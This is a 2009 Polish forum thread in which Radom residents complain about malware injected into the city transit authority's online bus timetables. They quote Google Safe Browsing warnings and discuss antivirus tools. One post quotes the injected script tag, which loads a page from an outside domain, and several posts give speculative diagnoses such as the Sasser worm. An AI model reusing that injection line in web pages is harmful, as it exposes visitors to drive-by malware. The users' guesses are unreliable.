serzwis 23.10.09, 20:56 Na stronie internetowej radomskiego MZDIK gnieździ się jakiś wirus, który prawdopodobnie uszkadza rejestr windy. Objawem jest uruchomienie się komputera z czarnym pulpitem i kursorem myszy. Uważajcie!!! Odpowiedz Link Zgłoś Obserwuj wątek Podgląd Opublikuj
Gość: Laki Re: Wirus na mzdik.pl IP: *.radom.vectranet.pl 23.10.09, 22:33 Nic tam nie ma. Usuń Avasta i zainstaluj coś lepszego. Odpowiedz Link Zgłoś
Gość: tomusP Re: Wirus na mzdik.pl IP: *.chello.pl 24.10.09, 01:07 Potwierdzam, dokładnie tak miałem z jednym z komputerów z zainstalowanym i na bieżąco aktualizowanym Kasperskym.. Odpowiedz Link Zgłoś
Gość: Wirus Re: Wirus na mzdik.pl IP: *.neoplus.adsl.tpnet.pl 24.10.09, 17:33 co się dzieje z tymi wirusami Odpowiedz Link Zgłoś
Gość: Laki Re: Wirus na mzdik.pl IP: *.radom.vectranet.pl 24.10.09, 20:59 Tam nie ma żadnego wirusa, Byłem na tej stronie 5 minut temu i nic !!! Odpowiedz Link Zgłoś
Gość: tomusP Re: Wirus na mzdik.pl IP: *.chello.pl 24.10.09, 21:18 Teraz już chyba ok. W poprzednią niedzielę sprawdziłem autobus, wyłączyłem kompa a po powrocie tylko czarny ekran i wskaźnik myszy. Odpowiedz Link Zgłoś
Gość: WR Re: Wirus na mzdik.pl to Czyż wraz z IP: *.radom.vectranet.pl 25.10.09, 17:25 jego zastępcami i wspierającym ich Kosztowniakiem. Takich nieudaczników wirusujących miejską komunikację to ze świecą szukać w świecie! Odpowiedz Link Zgłoś
darek_radom Re: Wirus na mzdik.pl 26.10.09, 00:53 Wirusa nie widzę, za to po wysłaniu e-maila pod jeden z "oficjalnych" adresów MZDiK dostaję raport, że adres jest nieprawidłowy... Ciekawe... Odpowiedz Link Zgłoś
Gość: nieznajomy Re: Wirus na mzdik.pl IP: *.radom.vectranet.pl 26.10.09, 08:50 ja za to straciłem wszystko na swoim kompie dzięki temu wirusowi, więc radzę nie odwiedzać tej strony, bo za dużo to potem kosztuje Odpowiedz Link Zgłoś
Gość: Ewel K. Re: Wirus na mzdik.pl IP: *.radom.vectranet.pl 26.10.09, 18:31 Lanie wody. Korzystam z tej strony. Nie ma na niej żadnych wirusów (mam jeden z najskuteczniejszych pakietów - firewall + antywirus). Odpowiedz Link Zgłoś
Gość: Serwis Motocyklowy Re: Wirus na mzdik.pl IP: *.algo.radman.pl 04.11.09, 16:58 Witam, jednak jest. jeden z moim laptopow padl na mzdik, zostal wylaczony a nastepnego dnia w pracy czarny ekran... Ale dane uratowane Odpowiedz Link Zgłoś
Gość: koko Re: Wirus na mzdik.pl IP: *.radom.vectranet.pl 04.11.09, 22:33 Jest wirus. Prawdopodobnie na rozkładach jazdy. Mi siadł komp. A potem okazało się że sąsiadowi też. Pogrzebałem trochę w sieci i po objawach zdaje się że to sasser. Odpowiedz Link Zgłoś
Gość: wers Re: Wirus na mzdik.pl IP: *.ats.pl 14.11.09, 14:43 Mam coś takiego: "Strona zgłoszona jako dokonująca ataków Strona www.mzdik.pl została zgłoszona jako strona stanowiąca zagrożenie i została zablokowana zgodnie z ustawieniami bezpieczeństwa. Tego rodzaju strony mogą próbować instalować oprogramowanie wykradające poufne dane, używające komputera do pośredniczenia w atakach lub uszkadzające system. Niektóre szkodliwe strony celowo rozpowszechniają niebezpieczne oprogramowanie, ale większość z nich działa na serwerach, na które nastąpiło włamanie." Po zignorowaniu: Bezpieczne przeglądanie Strona diagnostyczna dla www.mzdik.pl/rozklady Jaki jest obecny stan witryny www.mzdik.pl/rozklady? Witryna znajduje się na liście podejrzanych witryn — jej odwiedzenie może spowodować uszkodzenie komputera. W ciągu ostatnich 90 dni część tej witryny została 1 raz(y) umieszczona na liście witryn mających związek z podejrzanymi działaniami. Co się działo podczas odwiedzin Google w tej witrynie? Liczba stron przetestowanych w witrynie w ciągu ostatnich 90 dni: 137. Testy wykazały, że niektóre (77) z nich powodowały pobranie i zainstalowanie złośliwego oprogramowania bez zgody użytkownika. Robot Google po raz ostatni odwiedził tę witrynę 2009-11-13, a ostatni raz podejrzana treść została w niej wykryta 2009-11-12. Malicious software includes 4 scripting exploit(s). Liczba domen, w których przechowywane jest złośliwe oprogramowanie: 1. Są to między innymi następujące domeny: nextv.co.jp/. This site was hosted on 1 network(s) including AS8308 (NASK). Czy ta witryna działa jako pośrednik w dalszym rozpowszechnianiu złośliwego oprogramowania? W ciągu ostatnich 90 dni witryna www.mzdik.pl/rozklady nie funkcjonowała jako witryna pośrednicząca w rozpowszechnianiu wirusów. Czy ta witryna przechowuje złośliwe oprogramowanie? Nie, w ciągu ostatnich 90 dni w tej witrynie nie znajdowało się złośliwe oprogramowanie. Co mogło być przyczyną? W niektórych przypadkach aplikacje firm trzecich mogą dodawać złośliwy kod do wiarygodnych witryn, co powoduje wyświetlanie ostrzeżenia. Kolejne kroki: * Powrót na poprzednią stronę. * Jeśli jesteś właścicielem tej witryny, możesz poprosić o ponowne przeanalizowanie swoich stron za pośrednictwemNarzędzi dla webmasterów. Więcej informacji na temat procesu sprawdzania witryn znajduje się w Centrum pomocy dla webmasterów Odpowiedz Link Zgłoś
pitagor Re: Wirus na mzdik.pl 14.11.09, 16:13 Jest, przynajmniej wg google: img17.yfrog.com/img17/9267/47070861.jpg Odpowiedz Link Zgłoś
Gość: adek Re: Wirus na mzdik.pl IP: *.internetdsl.tpnet.pl 14.11.09, 18:00 Słuchajcie, co jest z tą stroną? Nie mogę sprawdzić nawet rozkładu jazdy, bo mój komputer nie chce mnie wpuścić na tą stronę. Mam taką samą informację jak opisujecie powyżej. Gdzie jeszcze mogę sprawdzić rozkład jazdy MPK? Odpowiedz Link Zgłoś
pitagor Re: Wirus na mzdik.pl 14.11.09, 19:19 Ma funkcje pokazującą najbliższy kurs: rozklady.komunikacja.radom.pl Odpowiedz Link Zgłoś
double.dog Re: Wirus na mzdik.pl 14.11.09, 19:33 Ja pie...e !!! Za co informatycy UM i MZDiK biorą kasę ???? Czy żaden geniusz (informatyk) nie potrafi załatwić tego problemu ?? Tak to jest jak zamiast fachowców przyjmuje się do pracy niedouczonych krewnych. Odpowiedz Link Zgłoś
Gość: star5555 Re: Wirus na mzdik.pl IP: *.radom.vectranet.pl 14.11.09, 21:51 już 5 kompów padło w moim otoczeniu rodzina, przyjaciele i ja xD ten wirus to raczej typ kodu skryptowego wstrzykniętego na podstronę rozkłady... czasem się zdaża że tego skryptu nie ma co oznacza że nie złapiemy tego wirusika natomiast niestety czasem się zdaża że stronka się zawiesza co oznacza że wirusik już coś kombinuje w miare szybko zamknięta strona może uratować was przed formatem. U mojej koleżanki spowodował to co u każdego czyli czarny pulpit albo zweiszke na logo windows + partycja D: Błąd dostępu co moze nareperować Combofix ;) przetestowane programy na tym wirusiku czyli Avast który spełnił swoją blokadę oraz NOD 32 (ten to nawet nei zczaił że coś jest grane i format lol. Napisałem do mzdik że mają wirusa to mnie olali i zignorowali to pewnie ;/ żal.com.pl ich xD Odpowiedz Link Zgłoś
Gość: Robak nie ksiądz Re: Wirus na mzdik.pl IP: *.anonymouse.org 14.11.09, 21:56 jak dostaną kilka pozwów o zwrot kasy za utratę danych to oprzytomnieją Odpowiedz Link Zgłoś
Gość: pasazer Re: Wirus na mzdik.pl IP: *.radom.vectranet.pl 14.11.09, 23:06 wirus jest tylko w rozkladach jazdy pozostale podstrony mzdik.pl powinny byc bezpieczne na miejscu mzdik rozwiazal bym umowe z firma u ktorej trzymaja strone skoro nie potrafi sobie poradzic z zabezopieczeniem serwera przed atakami Odpowiedz Link Zgłoś
darek_radom Re: Wirus na mzdik.pl 15.11.09, 00:46 Gość portalu: star5555 napisał(a): > Napisałem do mzdik że mają > wirusa to mnie olali i zignorowali to pewnie A dostałeś potwierdzenie, że e-mail dotarł do MZDiK? Ja pisałem na jeden z oficjalnych adresów: drogi@mzdik.pl i dostałem raport, że adres jest niepoprawny... PS.Na blogu p.Bohdana Karasia jest również informacja o "forumowym" wątku wirusa oraz innych atrakcjach zafundowanym Radomianom przez MZDiK... Odpowiedz Link Zgłoś
Gość: Laki Re: Wirus na mzdik.pl IP: *.radom.vectranet.pl 15.11.09, 11:13 Nie wiem gdzie wy macie tego wirusa ja wchodziłem na tą stronę i nie mam problemu z kompem. Naj więcej problemów mają osoby nie posiadających legalnego systemu ,a co za tym idzie wszystkich poprawek , drugą sprawą jest ten Pseudo Antywirus Avast. Dużo lepszym i też darmowym jest AVG. Odpowiedz Link Zgłoś
Gość: adek Re: Wirus na mzdik.pl IP: *.internetdsl.tpnet.pl 16.11.09, 15:07 Bo masz słabe zabezpieczenie i dlatego wchodzisz na tą stronę, a do tego jak korzystasz jeszcze z IE to już nie ma o czym gadać. Mój kaspersky jakoś mnie nie chce wpuścić na tą podstronę. Odpowiedz Link Zgłoś
Gość: Simone Re: Wirus na mzdik.pl IP: *.neoplus.adsl.tpnet.pl 16.11.09, 16:05 Miałam to samo. Do jakiegoś czasu strona działa bez problemów, po jakimś czasie wyskakiwał co jakiś czas komunikat od antywirusa żeby przerwać połączenie. PO kliknięciu ok strona się nie ładowała, a jak brałam anuluj to normalnie wyskakiwało okienko z rozkładem. Miałam tak parę razy jak wchodziłam na tą stronę aż do czasu jak się zawiesił komp. Po restarcie nic już się nie dało zrobić. Od nowa musiałam stawiać system:-/. Nie wiem co oni mają na tej stronie, zwłaszcza że to stronka MPK:-/ chyba powinni ją tak zrobić żeby nie było żadnego zagrożenia.Po postawieniu systemu dalej wchodze na tą stronę ale na razie nie mam takich komunikatów, tylko ciekawe do kiedy:-) Odpowiedz Link Zgłoś
Gość: elka Re: Wirus na mzdik.pl IP: *.radom.vectranet.pl 17.11.09, 09:48 JA TEZ BEZ PRZERWY KORZYSTAM Z ROZKLADOW I NIE MAM ZADNEGO PROBLEMU Odpowiedz Link Zgłoś
Gość: autor Re: Wirus na mzdik.pl IP: *.radom.vectranet.pl 17.11.09, 10:08 Dopóki korzystasz z Internet Explorera, nawet nie masz pojęcia o zagrożeniu... Odpowiedz Link Zgłoś
Gość: abc Re: Wirus na mzdik.pl IP: *.neoplus.adsl.tpnet.pl 17.11.09, 21:08 ta strona nie nalezy do MPK tylko MZDiK Odpowiedz Link Zgłoś
Gość: autor Re: Wirus na mzdik.pl IP: *.radom.vectranet.pl 16.11.09, 19:23 Na stronie mzdik.pl/rozklady w plikach htm i html został doklejony złośliwy kod, wczytujący - oprócz widocznych rozkładów jazdy autobusów - stronę z zupełnie innego serwera. Z tego, co udało mi się w miarę bezpiecznie podpatrzeć, jest to kod: <script nelliepratherfoundation.org/updates/temp.php ></script> Po kliknięciu na rozkład jazdy jakiejkolwiek linii autobusowej, Firefox wyświetla następujący komunikat: Witryna zgłoszona jako dokonująca ataków! Witryna www.mzdik.pl została zgłoszona jako witryna stanowiąca zagrożenie i została zablokowana zgodnie z ustawieniami bezpieczeństwa. Tego rodzaju witryny mogą próbować instalować oprogramowanie wykradające poufne dane, używające komputera do pośredniczenia w atakach lub uszkadzające system. Niektóre szkodliwe witryny celowo rozpowszechniają niebezpieczne oprogramowanie, ale większość z nich to witryny, na które nastąpiło włamanie. Co ciekawe - Internet Explorer nie wyświetla podobnego komunikatu, więc można nieświadomie uszkodzić system na komputerze. Nawet google, po wpisaniu w wyszukiwarkę adresu mzdik.pl/rozklady wyświetla odpowiednie ostrzeżenie. Można oczywiście zignorować powyższe Firefoxowe ostrzeżenie, ale jak już kilka osób wyżej wspomniało, nie jest to bezpieczne. Grozi nawet utratą danych z komputera, być może także zainstalowaniem się jakiegoś złośliwego oprogramowania, które potrafi wykradać dane wpisywane podczas normalnego surfowania po sieci (loginy i hasła do poczty elektronicznej, banków, allegro itd.). Niestety, Windows jest systemem dziurawym, więc ostrożności nigdy za wiele. Reasumując, klikanie teraz na mzdik.pl jest tylko dla odważnych. Tak, jak wspomniał wyżej bodajże Pitagor, istnieje alternatywa, gdzie także można sprawdzić aktualne rozkłady. PS. Chyba tylko kwestia czasu, gdy oficjalna strona miasta Radomia zostanie wykluczona w podobny sposób. Gołym okiem widać, że wszystkie rozkłady są kopiowane z mzdik.pl. Na chwilę obecną nie widać tam złośliwego kodu, ale jeśli informatycy z mzdik nic z tym nie zrobią, stronę www.radom.pl może czekać podobny los.. A to chyba nie będzie już takie 'funny'... Odpowiedz Link Zgłoś
Gość: wers Chyba coć robią, bo... IP: *.ats.pl 17.11.09, 20:01 Forbidden You don't have permission to access /rozklady/linie.htm on this server. Odpowiedz Link Zgłoś
Gość: hrthr Re: Wirus na mzdik.pl IP: *.internet.radom.pl 17.11.09, 22:43 noscript + updaty windowsa i nic nie wlezie Odpowiedz Link Zgłoś
Gość: star5555 Re: Wirus na mzdik.pl IP: *.radom.vectranet.pl 18.11.09, 12:45 no niestety albo stety usunęli dowody zbrodni z MZDIK xD wszystkie podstrony z rozkłady jazdy zniknęły hahah xD Odpowiedz Link Zgłoś
Gość: autor Re: Wirus na mzdik.pl IP: *.radom.vectranet.pl 18.11.09, 14:51 Wszystkie pliki z rozkładami zostały usunięte z serwera, ale to nie zmienia faktu, że domena nadal widnieje na liście niebezpiecznych, i Firefox wyświetla komunikat/ostrzeżenie... Odpowiedz Link Zgłoś
Gość: Ja Cały miesiąc im zajęło IP: *.neoplus.adsl.tpnet.pl 18.11.09, 17:48 Cały miesiąc im zajęło podjęcie decyzji jakiej kolwiek !!!! Odpowiedz Link Zgłoś
Gość: maciej_81 Re: Wirus na mzdik.pl IP: *.internetdsl.tpnet.pl 10.12.09, 10:32 To wejdzcie sobie na strone www.radom.pl zakladka komunikacja i jak wybierzecie jakis rozklad to tez pokazuje ze jest trojan. Ehhh gdzie ci ... informatycy .... Odpowiedz Link Zgłoś
darek_radom Re: Wirus na mzdik.pl 14.12.09, 17:16 Sprawdzałem przed chwilą na www.radom.pl i www.mzdik.pl. Prawdopodobnie informatycy wreszcie poradzili sobie z wirusem w rozkładach jazdy - mój antywirus niczego już nie zgłasza (wcześniej blokował dostęp do strony)... Odpowiedz Link Zgłoś
labellaluna Re: Wirus na mzdik.pl 14.12.09, 18:13 A ja dosłownie przed 15 minutami weszłam na radom.pl i gdy sprawdziłam rozkład dla linii nr 11 było ok, ale dla linii nr 1 już nie - avast alarmował o wirusie. Masakra! Odpowiedz Link Zgłoś
darek_radom Re: Wirus na mzdik.pl 14.12.09, 18:56 Potwierdzam - linie nr 1, 5, 12 - trojany... Za co ci informatycy biorą od Miasta pieniądze? Albo ponowna infekcja (czyli brak odpowiedniego zabezpieczenia strony), albo poszli "na skróty" i wkleili z powrotem na stronę zainfekowany kod. Bez komentarza... Odpowiedz Link Zgłoś
Gość: Radomianka Re: Wirus na mzdik.pl IP: *.radom.vectranet.pl 25.12.09, 10:13 weszłam dziś na stronę Radom-spotkajmy się w internecie, żeby w zakładce komunikacja sprawdzić rozkład jazdy jedynki program antywirusowy pokazał komunikat, żeby się przerwać połączenie ze stroną, bo znaleziono na niej trojana pierwszy post w tym wątku napisano 2miesiące temu, czy naprawdę przez tak długi czas nikt z Urzędu Miejskiego ani z MZDiK nie był w stanie usunąć wirusa? kurcze, przecież to straszny wstyd/-sprawdzałam ten rozkład ze znajomym, który przyjechał do miasta rodzinnego na Święta-następny powód, żeby nie żałować tego, że się stąd wyjechało Odpowiedz Link Zgłoś
Gość: gość Re: Wirus na mzdik.pl IP: *.radom.vectranet.pl 25.12.09, 22:57 > weszłam dziś na stronę Radom-spotkajmy się w internecie, żeby w zakładce > komunikacja sprawdzić rozkład jazdy jedynki > program antywirusowy pokazał komunikat, żeby się przerwać połączenie ze stroną, > bo znaleziono na niej trojana > pierwszy post w tym wątku napisano 2miesiące temu, czy naprawdę przez tak długi > czas nikt z Urzędu Miejskiego ani z MZDiK nie był w stanie usunąć wirusa? skoro to strona Radomia to Urzad Miejski tego nie usunal MZDiK ma swoja strone Odpowiedz Link Zgłoś
Gość: xxx Re: Wirus na mzdik.pl IP: *.radom.vectranet.pl 26.12.09, 01:13 Problem polega na tym, że "informatycy" <lol> z mzdik.pl poradzili sobie w ten sposób, że rozkłady zostały przeniesione z linku www.mzdik.pl/rozklady pod nową domenę mzdik.RADOM.pl/rozklady. Cóż, potrzebowali na to prawie 2 miesiące... Bez komentarza. Jeśli chodzi o rozkłady na radom.pl, są one pobierane automatycznie z mzdik.pl (prawdopodobnie), nie rozumiem tylko, czemu na mzdik.pl trojanów nie ma... Czyżby tym razem strona radom.pl miałabyć zgłoszona do 'witryn dokonujących ataków'? To będzie fantastyczna promocja marki Radomia :-D Odpowiedz Link Zgłoś